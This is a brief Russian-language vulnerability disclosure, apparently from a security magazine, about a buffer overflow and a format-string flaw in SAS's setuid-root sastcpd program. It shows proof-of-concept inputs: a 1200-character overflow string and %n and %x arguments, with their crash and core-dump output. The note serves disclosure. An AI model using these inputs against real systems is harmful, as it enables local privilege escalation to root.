Программы SAS предназначены для обработки
данных, их анализ, вывода отчетов. В sastcpd
существует буфер, который можно
переполнить, плюс программа неправильно
обрабатывает аргументы, а так как прога по
умолчанию устанавливается от rооt’а — можно
получить полный доступ к системе.

$ sastcpd `perl -e "print ‘A’ x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw——- 1 root teknix 1454382 Jan 28 04:22 core

$ sastcpd %n
Segmentation fault (core dumped)

$ sastcpd %x
Invalid argument: 2.



Оставить мнение